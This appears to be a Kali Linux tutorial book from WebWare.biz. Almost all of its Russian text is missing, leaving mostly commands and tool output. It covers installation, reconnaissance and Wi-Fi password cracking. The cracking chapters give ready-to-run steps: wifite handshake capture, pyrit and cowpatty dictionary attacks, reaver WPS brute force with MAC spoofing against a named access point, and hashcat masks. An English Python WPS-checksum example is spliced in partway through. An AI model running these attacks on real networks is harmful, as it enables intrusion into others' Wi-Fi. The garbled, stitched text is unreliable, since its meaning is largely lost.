
Kali Linux

( WebWare.biz)

, , :
(alex@webware.biz)
: WebWare.biz

.
, - !
2

................................................................................................................................ 4
................................................................................................................. 5
1. Kali Linux ........................................................................... 6
Kali Linux? .......................................................................................................... 6
Kali Linux:
....................................................................................................... 7
VirtualBox Guest Additions Kali Linux 1.1.0 ............................................. 23
Kali Linux ( ............... 24
VMware Kali ............................................................. 43
VPN Kali Linux
VPN ..................................................................................................................... 44
Kali Linux ........... 49
2. Kali Linux ............................................................................................. 51
Kali Linux 1.1.0. 1.
...................................................................................................................... 51
Kali Linux 1.1.0. 2.
........................................................................................................................ 58
3. ....................................................... 77
Wi-Fi (WPA/WPA2), pyrit cowpatty Kali Linux ............... 77
Wifi WPA/WPA2 Reaver .......................................... 81
Reaver t6x Pixie Dust ................ 85
WPA2/WPA Hashcat Kali Linux ( Wi-
Fi ) .......................................................................................................... 90
Wifite Pixiewps .................................................................................. 95
Wi-Fi : , Kali Linux ............................. 97
Router Scan by StasM Kali Linux ( Wi-Fi
) ....................................................................................................................... 104
4. - ................................................................................................................. 109
- (DoS -) SlowHTTPTest Kali Linux: slowloris, slow
body slow read ................................................................ 109
- : DoS - Kali Linux GoldenEye ......................................... 117
- Low Orbit Ion Cannon (LOIC) ......................................................... 123
5. - ............................................................................ 129
SQLMAP Kali Linux: - SQL-
........................................................................................................................... 129
WordPress: WPScanner Plecost ....................................... 138
W3af Kali Linux .............................................................................................. 142
Metasploit Framework Kali Linux ........................................................ 145
3

Metasploit Exploitation Framework searchsploit


......................................................................................................................... 146
6. 157
OpenVAS 8.0 .................................................................. 157
Linux (rootkits) rkhunter ............................. 160
Linux .............................................................................................. 162
Linux Malware Detect (LMD) Linux ........................................................ 167
Windows? ...................................................................................... 170
7. . ................................................................. 173
- WireShark ( ) ............... 173
.................................................................................................................. 178
4

- Kali Linux .
WebWare.biz.
WebWare.biz : -
- ( ), . (
) .

, ,
.

- , .
- , ,
, ,
- . - , .
. ,
Shift+Delete.

WebWare.biz , Kali Linux.


. .
Linux - Linux,
, ,
- , Kali Linux.
.
- -. ,
30-50 , , .
Kali Linux - BackTrack -
BackTrack Kali Linux.
.

- . : ,
, . ,
, WebWare.biz. -
WebWare.biz . , - ,
( , , ) -
.
. ( -,
, ,
). , , ,
,
http://webware.biz/?page_id=27 .

, , ,
http://webware.biz/?p=3327, , .

: . -
, : http://webware.biz/?p=3920.
,
5

. .. .
- , http://webware.biz/?p=3920,
, , .

- , :
http://webware.biz/?goto=3

VPS - , , :
http://webware.biz/?goto=478388

- : WebWare.biz

: http://webware.biz/?p=3920

, Linux, - ,
WebWare.biz: http://ZaLinux.ru/
6

1. Kali Linux

Kali Linux?

Kali Linux Linux


.
Kali Linux
Kali BackTrack Linux,
Debian. ,
, Git VCS.
300 :
, BackTrack,
,
, .
: Kali Linux, ,
. , Kali
Linux.
Git :
,
, .
FHS : Kali , Filesystem Hierarchy
Standard, Linux ,
, ..
: Kali Linux
,

USB .
: ,
,
.
: Kali Linux
,
.
GPG : Kali
,
.
: , ,
, , Kali ,

, .
: ,
,
Kali Linux , .
ARMEL ARMHF: ARM-
, , Kali
ARM- ARMEL
ARMHF . Kali Linux ARM
, ARM
. ARM-:
o rk3306 mk/ss808
o Raspberry Pi
7

o ODROID U2/X2
o Samsung Chromebook
Kali , ,
,
Linux.

Kali Linux:

Kali Linux 1.1.0


Kali Linux , Linux Debian. ,
, , .
.. ,
,
- . .
Kali Linux ,
WebWare.biz ,
RSS-, e-mail
.
, Kali Linux
:
8

, Kali Linux 64 bit ISO


Kali Linux 32 bit ISO. , (
).
- , Kali Linux
(
, ,
.
Kali Linux Live-
( Live- ).
Kali Linux , . . ()
(, ).
VirtualBox,
( ).
VirtualBox . ,
(Linux) (

). ( Debian, . . Kali Linux
):

,
, .
, VirtualBox, ,
VirtualBox :
9

,
( Live-
, ):
10

.
. . .
, 30 , ,
30 , . . .
, (,
2-3 ),
:
11

,
, ,
. -
, , . 10
, , :
12

, Kali Linux, kali-linux-


1.0.9a-amd64, , kali-linux-1.0.9a-amd64.iso.
13

. -
, Kali Linux:

:
14

Live- ( ),
. Install ():

, ,
.
:
15

( , ):
16

. .
( , Enter):
17

Enter:

. :
18

, :

, :
19

, . . Kali Linux
:
20

( , -
):
21

.iso ,
:
22

'root' :
23

Kali Linux
.

VirtualBox Guest Additions Kali Linux 1.1.0

Guest Additions Kali Linux,


Debian Debian,
Ubuntu Ubuntu.
VirtualBox , ,
Guest Additions (VboxGuestAdditions.iso).
, , .
Linux' Guest Additions ,
. Debian .
Guest Additions Kali Linux 1.1.0,
. , , .
, , VboxGuestAdditions.iso autorun.sh.
, ,
( ).
VBoxLinuxAdditions.run
.
VBoxLinuxAdditions.run ,
Guest Additions ,
'fail' var/log/vboxadd-
install.log.
, .
Creating user for the Guest Additions.
Creating udev rule for the Guest Additions kernel module.
/tmp/vbox.0/Makefile.include.header:97: *** Error: unable to find the sources of your current Linu
Creating user for the Guest Additions.


+ . :
$ #
.
-, , ,
:
$ sudo apt-get update
:
# apt-get update
( ), :
$ apt-cache search linux-headers-$(uname -r)
, , ,
. .
.
linux-headers Debian Ubuntu Linux,
:
$ sudo apt-get install linux-headers-$(uname -r)
:
# apt-get install linux-headers-$(uname -r)
VBoxLinuxAdditions.run
.
Guest Additions.

Kali Linux (

Linux
Kali Linux :
( ,
Wi-Fi );
(
; )
GPU Wi-Fi-
Wi-Fi-;
, ;
;
Kali Linux .
. ,
(). ,
, Windows .
, (SSD).
( ), (
) , , . , ,
.
25

, WebWare.biz Kali Linux Live USB.


Live. .. Live .
Live , . ..
.
, ,
(Persistence) Kali Live USB.
Linux,
.
, Kali USB
.
, , Kali Linux
.
, .
, ,
.
, Linux! ..
Mint, Ubuntu -,
.
Linux USB--

VirtualBox.
. Linux ,
. , ,
. , , VirtualBox.
. , ,
Linux. , , , , Debian (64 bit).
64- ,
.
26

. , , 1 .
.

, :
27

, .
.
. Kali Linux .
, !

. Kali Linux :
28

, ( ).
. , Kali Linux . ,
. ,
USB- (
) . Linux Mint.
: , VirtualBox . ..
.
: USB 3 USB 2. VirtualBox
5 USB 3 ( ). ,
.
( - ) Linux
. , . ..
- , -.
, ,
, :
29

Kali Graphical install.

. , .
, Kali.
30
31
32
33

. USB 3,
.
34

- :
35

.
, .
. .
Kali Linux
Windows , ,
. Delete Esc (
). ,
.
, . , USB 3,
. USB 2.
Windows ( ),
Microsoft UEFI. ,
( , ?).
(
):
shutdown.exe /r /o
,
. :
36

UEFI:
37

:
38

, -.
, . Boot,
Boot Option Priorities, :

.
Secure Boot (Disable):
39

OS Mode Selection. CMS and UEFI OS.


CMS OS, Windows .
40

Fast BIOS Mode (Disable).


, USB :
41

:
42

! .
F2. Delete.
.
, . .
, Esc F*.
Boot Option Priorities. .
, Windows Boot Manager,
: , Linux
. , Windows
!

:
43


VirtualBox .
Live- Linux
CD (DVD)-, , .
:
CD (DVD)- ( );
.
( Linux ),
( ).
, . .
VirtualBox, :
Kali Linux Live USB
(Persistence) Kali Live USB
Kali,
. .

VMware Kali
44

VMware,
VMware,
VMware Kali.
opt open-vm-toolbox, VMware.
open-vm-tools
, , VMware
Kali VMware.
apt-get install open-vm-toolbox
VMware Kali
vmware-tools ,
. vmware-tool
.
cd ~
apt-get install git gcc make linux-headers-$(uname -r)
git clone https://github.com/rasa/vmware-tools-patches.git
cd vmware-tools-patches
ISO VMware, Install VMware Tools
( VMware) . ISO
VMware , ,
:
cd ~/vmware-tools-patches
cp /media/cdrom/VMwareTools-9.9.0-2304977.tar.gz downloads/
./untar-and-patch-and-compile.sh

VPN Kali Linux


VPN

VPN VPN Kali


Linux
(VPN) ,
.
, ,
,
. VPN
,
. Kali Linux, , VPN , . .
. ,
VPN
VPN Kali Linux.
,
(, ),

45

(, , ,
). .
VPN
. VPN
, . VPN
-
.
VPN ?
11 , VPN.
1. VPN IP .
2. ( WiFi)

3. .
4. .
5. !
6. ( Youtube, NetFlix
BBC Player ..)
7. .
8. /VOIP .
9. , .
10. .
11. .
, VPN .
, , , ,
, ( !), (, Alexa, Google Toolbar . .).
VPN Kali Linux
, Kali Linux VPN . ,
, , , VPN,
- -, .
, .
, .
46

, .

VPN Kali Linux


-, .
Kali Linux. .
, , .
.
aptitude -r install network-manager-openvpn-gnome network-manager-pptp network-manager-pptp
47

, , aptitude of apt-get,
-r, Network-Manager.
aptitude -r install, , , ,
( , - 1969 kB,
).
, Network-Manager , aptitude .
, ?
, , ,
VPN .
, , , .
VPN Kali Linux (GNOME)
, , VPN.
48

,
VPN:

Kali Linux 4 VPN:


Cisco Compatible (vpnc)
IPsec/IKEv2 (strongswan)
OpenVPN
Point-to-point Tunneling Protocol (PPTP)

VPN , VPN , VPN , ,
. VPN,
, , . ,
, , , , . .,
, , .
, .
49

Kali Linux

(
) Kali. ,
. ,

cat /etc/apt/sources.list
:
#

# deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot amd64 LIVE/INSTALL Binary 20150312-17:50]/ kali contrib main non-free

#deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot amd64 LIVE/INSTALL Binary 20150312-17:50]/ kali contrib main non-free

deb http://security.kali.org/ kali/updates main contrib non-free
deb-src http://security.kali.org/ kali/updates main contrib non-free

- , - .
, :
if cat /etc/apt/sources.list | grep -E "deb http://http.kali.org/kali kali main non-free contrib" && cat /
echo -e "\n\n "; else echo -e "\n\n "; fi
. , :

:
echo -e "deb http://http.kali.org/kali kali main non-free contrib\ndeb http://security.kali.org/kali-security kali/updates main contrib non-free" > /etc/apt/sources.list

, sources.list (
). .. - ,
. , .
,
Kali.

:
50

:
root@WebWare-Kali:~# cat /etc/apt/sources.list
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free
.
, :
apt-get update
51

2. Kali Linux

Kali Linux 1.1.0. 1.


Kali Linux ,
, ,
.
Information Gathering


.
.

Vulnerability Analysis
52

.
, ,
( Information Gathering).

Web Applications

-.
. ,
- -,
. , - .

Password Attacks
53

, (
)
.

Wireless Attacks


. 802.11 , , aircrack,
airmon . ,
RFID Bluetooth. ,
,
Kali .

Exploitation Tools
54

.
(Vulnerability Assessment)
.

Sniffing and Spoofing

,
, (spoofing).
VoIP

Maintaining Access
55

(Maintaining Access)
.
,
, ,
, .

Reverse Engineering

, , (debug) .
, ,
, , .
, ,
,
.
56

Stress Testing

(Stress Testing)
.
,
(
).

Hardware Hacking

Android,
Android,

Forensics
57

(Forensics)
, .

Reporting Tools

(Reporting tools) ,
.
58

System Services

Kali. BeEF,
Dradis, HTTP, Metasploit, MySQL, SSH.

Kali Linux , , -,
Kali Linux,
(, ).

Kali Linux 1.1.0. 2.


. , -
. , ,
, , -,
( . .),
. , !
Kali Linux ,
.
1. HTTrack -
- . ,
PHP . ,
. ,
.
59

Kali Linux, ,
:
apt-get install httrack
, , ,
HTTrack:
mkdir webware.biz
cd webware.biz
httrack

, , URL ( )
, webware.biz , :
60

1. ()
2. ()
3.
4. URL
5. URL ( )
0.
. , ,
, (*),
() , , ,
:
61

HTTrack ( ):
62

, ,
.
2. fping Nmap
63

ping, , . ,
ICMP . fping
.
IP ICMP.

fping -asg network/host bits
fping -asg 10.0.1.0/24
-a IP , -s
, -g fping , ,
, ,
.
Nmap .
3. Dig DNS

dig <_>

dig webware.biz
64

DNS ( webware.biz
, ):
dig -t ns webware.biz

4. Fierce
, , webware.biz mail.webware.biz,
cloud,webware.biz, th.webware.biz ..
( ):
fierce -dns webware.biz
zone transfer , .
65

5. Maltego
: Information Gathering| DNS Analysis| Maltego
Maltego , Kali
Paterva. ,
.
:
66

, , .
67

:
68
69

6. Nmap
Nmap . Nmap
, , ,
.
, , .
Nmap ,
.
Kali Zenmap. Zenmap Nmap
.
Zenmap ,
.
Zenmap,
Kali Linux | Information Gathering | Network Scanners | zenmap
,
.
70

:
71
72

7. Metagoofil
!
, , , GPS
, ,
- . , ,
.
Metagoofil , :
73

-d:
-t: (pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx)
-l: ( 200)
-h: ( "yes" )
-n:
-o: ( )
-f: ,
:
metagoofil -d webware.biz -t doc,pdf -l 200 -n 50 -o applefiles -f results.htm
: ,
, , .
.
:
74

:
75

:
76

, - ( , GPS
, ), - ! -
.
77

3.

Wi-Fi (WPA/WPA2), pyrit cowpatty Kali Linux

: .
, , , ,
.
, .
,
Wi-Fi.
Wi-Fi (WPA/WPA2), pyrit cowpatty cuda calpp Kali
Linux
Wifi WPA/WPA2 ,
. . ,
.
,
Wifi WPA/WPA2, pyrit cowpatty Kali Linux,
, cuda calpp (cal++),
WiFite . Kali Linux
10 Wifi WPA/WPA2
pyrit, cowpatty WiFite, AMD.
, .
AMD ATI, .
NVIDIA:
1. NVIDIA Kali Linux NVIDIA
Linux
2. NVIDIA CUDA Pyrit Kali Linux CUDA, Pyrit
Cpyrit-cuda
AMD:
1. fglrx AMD ATI fglrx Kali Linux
2. AMD APP SDK Kali Linux
3. CAL++ Kali Linux
4. Pyrit
, Wifi WPA WPA2,
HashCat cudaHashcat oclHashcat Wifi WPA WPA2
. Hashcat ,
, , .
,
,
. Hashcat Wifi WPA/WPA2
MD5, phpBB, MySQL SHA1 . Hashcat
, 1 2 ,
12 . 4 , 3 .
,
, , .
.
: ,
. , Kali Linux,
, . .
802.11 Kali Linux ( USB). ,
78

,
-, .
handshake WiFite
WiFite, Aircrack-ng, ?
.
:
airmon-ng start wlan0
Kali Linux:
wifite -wpa

wifite wpa2
(wep, wpa or wpa2),
,
wifite
, (
). CLIENTS. ,
clients, .
. all
, , . 1,2 ENTER.
, clients, ,
. . . , .
, , , , -
.
, 1 2 ENTER, WiFite .
ENTER, .
, 1 - , . .
. CTRL+C .
, Wifite, . . :
What do you want to do?

[c]ontinue attacking targets

[e]xit completely.
c, , e . ,
. c .
1 2. , . .
. , , ,
,
.
, (handshake) .
.
/root/hs/BigPond_58-98-35-E9-2B-8D.cap.
, Wifite
.
, ,
:
1. .
2. .
crunch
oclhashcat
79

, . . 20% ( )
.
.
.cap Wi-Fi
, .
Kali Linux , .
. Kali Linux.
root.
cp /usr/share/wordlists/rockyou.txt.gz .
.
gunzip rockyou.txt.gz
, , WPA2 8 ,
, , 8
63 ( , ,
). , newrockyou.txt.
cat rockyou.txt | sort | uniq | pw-inspector -m 8 -M 63 > newrockyou.txt
, :
wc -l newrockyou.txt
9606665 .
.
wc -l rockyou.txt
14344392 . , , ,
.
, wpa.lst.
mv newrockyou.txt wpa.lst
ESSID Pyrit
ESSID Pyrit
pyrit -e BigPond create_essid
: , , NetComm Wireless,
:
pyrit -e 'NetComm Wireless' create_essid
, .
, ESSID, Pyrit
Pyrit
, ESSID Pyrit,
.

wpa.lst Pyrit.
pyrit -i /root/wpa.lst import_passwords
Pyrit, (batch)
,
pyrit batch
,
15019 PMKs ( CAL++).
CUDA NVIDIA, CAL++
AMD, .
100%, 94
. ,
. ,
.

.
80

1. Pyrit
2. Cowpatty
(handshake) , Pyrit
. .
pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap attack_db
. ,
, . 159159186.00
PMK's 1 . , ,
.
: NVIDIA
CUDA Cpyrit-CUDA. , .
, .
Pyrit, "
Pyrit: IOError: libpcap-error while reading: truncated dump file; tried to read 424 captured
bytes, only got 259".
(handshake) , Pyrit
crunch,
( ),
pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap -i /root/wpa.lst attack_passthrough
? 7807 PMKs . .
Cowpatty
cowpatty, cowpatty
.
cowpatty
, . Pyrit
cowpatty airolib-ng. ,
cowpatty , .
cowpatty. ,
, cowpatty.
pyrit -e BigPond -o cow.out export_cowpatty
: WPA WPA2 PSK cowpatty
, cowpatty, WPA2/PSK.

cowpatty -d cow.out -s BigPond -r hs/BigPond_58-98-35-E9-2B-8D.cap
, ,
. .
, .
, . ,
. 164823.00 /.
: cowpatty ( ),
/ , 2 . airolib-ng,
.
(handshake) cowpatty, Pyrit
Pyrit.
cow.out Pyrit
pyrit -r hs/BigPond_58-98-35-E9-2B-8D.cap -i /root/cow.out attack_cowpatty
? 31683811 PMKs . ,
Pyrit attack_db. , ,
(batch) .
Pyrit
, , essid .
pyrit -e BigPond delete_essid
81


. , Wifi
WPA/WPA2 Reaver-WPS. ,
.
, , ,
.

Wifi WPA/WPA2 Reaver

Reaver
Reaver WPS (Wifi Protected Setup) .
WPA/WPA2. Reaver
WPS,
WPS. , Reaver WPA/WPA2
() 4-10 , . ,
WPS .
.. Reaver 2012 , .
https://code.google.com/p/reaver-wps-fork/.
2014 .
. ( 2015 )
Reaver.
https://github.com/t6x/reaver-wps-fork-t6x. ,
Pixie Dust WPS.
Ralink, Broadcom Realtek. , , Wiire.
Reaver , .
.
, , Wi-Fi
Wi-Fi (WPA/WPA2), pyrit cowpatty
Kali Linux. ( Wifite)
.
.
Wi-Fi :
()
WPS.
.
-,
. -, , ,
, .
WPA2/WPA Hashcat Kali Linux ( Wi-Fi ),
, . ,
, ,
. Hashcat ,
Wifi WPA/WPA2, MD5, phpBB, MySQL, SHA1 .
Reaver WPS
, , WPS.
,
( .. WPA PSK).
, . , ,
Reaver , , .
: . -
. :
, . 10^8
82

(100,000,000) . ,
, . . , ,
10^7 (10,000,000).
, ,
, . ,
10^4 (10,000) , 10^3 (1,000), . .
.
Reaver , .
, , 11,000. , Reaver
.
,
, 10 .
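As an added example (not from the book and not Reaver's code), the following Python computes the WPS PIN check digit defined in the Wi-Fi Protected Setup specification and reproduces the keyspace figures given above: 10^8 for eight free digits, 10^7 once the check digit is derived from the other seven, and 10^4 + 10^3 when the protocol lets the two halves be confirmed separately. It is written so that an administrator can see, in numbers, why a WPS PIN registrar that stays enabled is a setting to turn off rather than a secret to strengthen.

```python
# Added example (not from the book, not Reaver's code): the WPS PIN check digit
# and the keyspace figures quoted in the text (10^8, 10^7, 11,000).
# The check-digit rule is the one in the Wi-Fi Protected Setup specification.


def wps_checksum(first_seven: int) -> int:
    """Return the 8th (check) digit for a 7-digit WPS PIN prefix."""
    if not 0 <= first_seven <= 9_999_999:
        raise ValueError("prefix must be seven decimal digits")
    accum = 0
    value = first_seven
    while value:
        accum += 3 * (value % 10)   # digits at odd positions (from the right) weigh 3
        value //= 10
        accum += value % 10         # digits at even positions weigh 1
        value //= 10
    return (10 - accum % 10) % 10


def is_valid_wps_pin(pin: str) -> bool:
    """True when an 8-digit PIN string carries the correct check digit."""
    if len(pin) != 8 or not pin.isdigit():
        return False
    return wps_checksum(int(pin[:7])) == int(pin[7])


def pin_keyspace(checksum_known: bool, halves_verified_separately: bool) -> int:
    """Worst-case number of PIN candidates, under the two facts the text explains.

    checksum_known: the 8th digit is fixed by the first seven (10^8 -> 10^7).
    halves_verified_separately: the registrar confirms the first four digits
    before the last three plus check digit are tried (10^4 + 10^3 = 11,000).
    """
    if not checksum_known:
        return 10 ** 8
    if not halves_verified_separately:
        return 10 ** 7
    return 10 ** 4 + 10 ** 3


if __name__ == "__main__":
    print("check digit for 1234567:", wps_checksum(1234567))
    for known, split in ((False, False), (True, False), (True, True)):
        print(f"checksum known={known}, halves split={split}: {pin_keyspace(known, split):,} candidates")
```

`pin_keyspace(True, True)` returns 11000, the figure the text gives; at one attempt every few seconds that is hours rather than years, which is the whole argument for disabling WPS PIN on the access point rather than relying on it.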
Reaver
Kali Linux, . (Reaver, libpcap libsqlite3).
Reaver

airmon-ng

, . wlan0.
airmon-ng start <_>
:
airmon-ng start wlan0
Reaver : BSSID . ,
, BSSID :
airodump-ng --wps wlan0mon
83

, Kitty, BSSID 4C:72:B9:FE:B8:0C.


Reaver' . airodump-ng
.
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C
SSID ( , SSID )
Reaver', :
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -c 4 -e Kitty
, , Reaver
. , ,
:
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --fixed
5 . ,
( 1 ).
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -t 2
1 .
.
:
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -d 0
WPS , 5 ,
. ,
, Reaver 315 (5 15 )
-, WPS .
:
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --lock-delay=250
, .
,
:
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -vv
84

M5 M7 WPS 0.1 .
, (
1 ):
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -T .5
WPS , ,
, NACK, .
, M5/M7, NACK .
, , NACK' ( ),
. ,
Reaver , NACK'
:
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --nack
EAP FAIL
WPS, . , ,
, :
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --eap-terminate
10 WPS,
. ,
, ,
:
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --fail-wait=360

, Reaver 1 .
-d 0 , :
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -d 0
, , dh-small.
Reaver -,
:
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C --dh-small
Reaver, Pixiewps -K 1
Pixiewps
. Reaver t6x Pixie Dust
Kali Linux. . ..
, Reaver.
Pixiewps . -K 1.
, Reaver Pixiewps. ..
:
reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -K 1
Reaver t6x
Pixie Dust.
:
Reaver ;
: -K // pixie-dust reaver; -H // pixiedust-log
reaver; -P // pixiedust-loop reaver
MAC
/ MAC . Reaver
MAC mac, , MAC
, . . .
MAC (
wlan0mon) . MAC
. :
# ifconfig wlan0 down
# ifconfig wlan0 hw ether 04:DE:AD:BE:EF:45
# ifconfig wlan0 up
# airmon-ng start wlan0
# reaver -i wlan0mon -b 4C:72:B9:FE:B8:0C -vv --mac=04:DE:AD:BE:EF:45

Reaver t6x Pixie Dust

Reaver?
Reaver WPS (Wifi Protected Setup)
. Reaver WPS,
WPS. , Reaver
WPA/WPA2 () 4-10 ,
. ,
WPS .
- https://code.google.com/p/reaver-wps/. Pro
.
Reaver
.. Reaver 2012 , .
https://code.google.com/p/reaver-wps-fork/.
2014 .
. ( 2015 )
Reaver.
https://github.com/t6x/reaver-wps-fork-t6x. ,
Pixie Dust WPS.
Ralink, Broadcom Realtek.
, , Wiire.
Reaver, Pixiewps.
, Kali Linux: , , .
Pixiewps
Pixiewps ( Kali Linux, ,
sudo):
sudo apt-get install libssl-dev
.
zip- Download ZIP.
Kali Linux , Linux
.
86

cd Downloads
unzip pixiewps-master.zip
cd pixiewps-master/src
make
gcc -std=c99 -o pixiewps pixiewps.c random_r.c -lssl -lcrypto
make install

install -D pixiewps /usr/local/bin/pixiewps
install -m 755 pixiewps /usr/local/bin
Reaver t6x
, Kali Linux ,
" ". .
Reaver, .
.
Reaver
apt-get -y install build-essential libpcap-dev sqlite3 libsqlite3-dev aircrack-ng pixiewps
Pixiewps by Wiire , ,
.
Reaver
git clone https://github.com/t6x/reaver-wps-fork-t6x

wget https://github.com/t6x/reaver-wps-fork-t6x/archive/master.zip && unzip master.zip

cd reaver-wps-fork-t6x*/
cd src/
./configure
make

sudo make install
Reaver
Reaver ,
.
87

Reaver , . ,
,
reaver -v
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
, .
:
-i, --interface=<wlan>
-b, --bssid=<mac> BSSID

:
-m, --mac=<mac> MAC
-e, --essid=<ssid> ESSID
-c, --channel=<channel> 802.11 (
-f)
-o, --out-file=<file> - [stdout]
-s, --session=<file>
-C, --exec=<command>

-D, --daemonize reaver
-a, --auto

-f, --fixed
-5, --5ghz 5GHz 802.11
-v, --verbose (-vv
)
-q, --quiet
-K --pixie-dust=<> [1] pixiewps PKE, PKR, E-Hash1, E-Hash2,
E-Nonce Authkey (Ralink, Broadcom, Realtek)
-Z, --no-auto-pass reaver
WPA, pixiewps
-h, --help

:
-p, --pin=<wps pin> 4 8 WPS
-d, --delay=<> [1]
-l, --lock-delay=<seconds> ,
[60]
-g, --max-attempts=<>
-x, --fail-wait=<> 10
[0]
-r, --recurring-delay=<x:y> y x
-t, --timeout=<> [5]
-T, --m57-timeout=<> M5/M7 [0.20]
-A, --no-associate (
)
-N, --no-nacks NACK

-S, --dh-small DH

-L, --ignore-locks ,

-E, --eap-terminate WPS EAP FAIL
-n, --nack NACK [Auto]
-w, --win7 Windows 7 registrar [False]
-X, --exhaustive [False]
-1, --p1-index
[False]
-2, --p2-index
[False]
-P, --pixiedust-loop PixieLoop ( M4
M3) [False]
-W, --generate-pin devttys0 [1] Belkin
[2] D-Link
-H, --pixiedust-log
PixieHashes
:
reaver -i mon0 -b 00:AA:BB:11:22:33 -vv -K 1
-K // pixie-dust reaver
89

-K 1 pixiewps PKE, PKR, E-Hash1, E-Hash2, E-Nonce Authkey. pixiewps


Ralink, Broadcom Realtek.
* : Realtek, DH (-S)
-H // pixiedust-log reaver
-H PixieHashes,
. -vvv, ,
, -K 1 & -P.
bssid (MAC) .pixie.
PixieDust,
pixiewps.
.
( chmod +x <_>).
-P // pixiedust-loop reaver
(-P) reaver reaver ,
M4 WPS, , , .
PixieHash, pixiewps,
.
:
/
, ..
,
.
,
PixieHash, .
Wash
Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
:
-i, --interface=<iface>
-f, --file [FILE1 FILE2 FILE3 ...]

:
-c, --channel=<num> [auto]
-o, --out-file=<file>
-n, --probes=<num>
[15]
-D, --daemonize wash
-C, --ignore-fcs
-5, --5ghz 5GHz 802.11
-s, --scan
-u, --survey [default]
-P, --file-output-piped Wash
. . wash x|y|z...
-g, --get-chipset reaver

-h, --help
:
wash -i mon0
-g // get-chipset
-g wash reaver .
, , . .
reaver (30
).

WPA2/WPA Hashcat Kali Linux ( Wi-Fi


)

Hashcat (cudaHashcat oclHashcat) Kali Linux


() WPA2 WPA. Hashcat .cap .
.cap .hccap. .
Hashcat
Hashcat, ,
, . ,
. Linux, OSX Windows,

. Hashcat
, Microsoft LM Hashes, MD4, MD5, SHA,
Unix Crypt, MySQL, Cisco PIX ( ).
Hashcat , . .
, ,
hashcat (, 1Password).
Hashcat
Hashcat
. :
91

- ()









,
Hashcat .
Hashcat
Hashcat :
Hashcat
oclHashcat
, Hashcat,
, GPU.
oclHashcat,
MD5, SHA1 . ,
GPU. Bcrypt . -
, ( ),
oclHashcat Hashcat.
Hashcat Linux, OSX Windows. oclHashcat Linux Windows -
OpenCL OSX.

Kali Linux 1.1.0a Radeon HD 7870M Series,
rockyou .
WPA2 WPA Hashcat ( .cap-)
cudaHashcat oclHashcat Hashcat Kali Linux.
oclHashcat, . . AMD GPU.
NVIDIA GPU, cudahashcat.
, CUDA
NVIDIA fglrx AMD. .
NVIDIA:
NVIDIA Kali Linux NVIDIA
Linux
NVIDIA CUDA Pyrit Kali Linux CUDA, Pyrit
Cpyrit-cuda
AMD:
fglrx AMD ATI fglrx Kali Linux
AMD APP SDK Kali Linux
CAL++ Kali Linux
Pyrit
Hashcat WPA WPA2?
Pyrit , WPA2 WPA.
Hashcat WPA2 WPA?
?
Hashcat
. , , .
Hashcat
WPA2 WPA.
92


?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s =  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff

, 12345678.
?d?d?d?d?d?d?d?d
, 12345678 23456789
01567891. , .

, ABCFEFGH LKHJHIOP ZBTGYHQS . .,
:
?u?u?u?u?u?u?u?u
.

, : abcdefgh dfghpoiu bnmiopty
. ., :
?l?l?l?l?l?l?l?l
. , .

, a1b2c3d4 p9o8i7u6 n4j2k5l6 . . (
), :
?l?d?l?d?l?d?l?d

, A1B2C3D4 P9O8I7U6 N4J2K5L6 . .
( ), :
?u?d?u?d?u?d?u?d
, , .
,
:
?a?a?a?a?a?a?a?a
: ?a , .
, .
.

- ,
.
. . ,
, abc, -
. :
abc?l?l?l?l?l
abc?u?u?u?u?u
abc?d?d?d?d?d
abc?l?u??d??d?l
abc?d?d?l?u?l
- , 125 .
. cudaHashcat
oclHashcat Hashcat Kali Linux WPA2 WPA .
93

,
. .
, , ,
, ,
.
: Abcde123
:
?u?l?l?l?l?d?d?d
.

Hashcat
.
:
--custom-charset1=CS
--custom-charset2=CS
--custom-charset3=CS
--custom-charset4=CS
CS . CS
, . . ,
, .
: -1, -2, -3 -4.

hashcat ( .hcchr,
/, ).
:

,
abcdefghijklmnopqrstuvwxyz0123456789 (aka lalpha-
numeric):
-1 abcdefghijklmnopqrstuvwxyz0123456789
-1 abcdefghijklmnopqrstuvwxyz?d
-1 ?l0123456789
-1 ?l?d
-1 loweralpha_numeric.hcchr # , + (abcdefghijk
, 0123456789abcdef:
-1 ?dabcdef
7- ascii charset (aka mixalpha-
numeric-all-space):
-1 ?l?d?s?u
(-1)
, :
-1 charsets/special/Russian/ru_ISO-8859-5-special.hcchr
Kali Linux .hcchr
:
tree /usr/share/maskprocessor/charsets/

tree /usr/share/hashcat/charsets/
: abc, 8 ,
.
, :
, ,
:
94

-1 ?l?d?u
:
abc?1?1?1?1?1
, , 1. l .
. ()
. , ,
Wifi WPA2 WPA pyrit cowpatty Kali Linux. ,
.
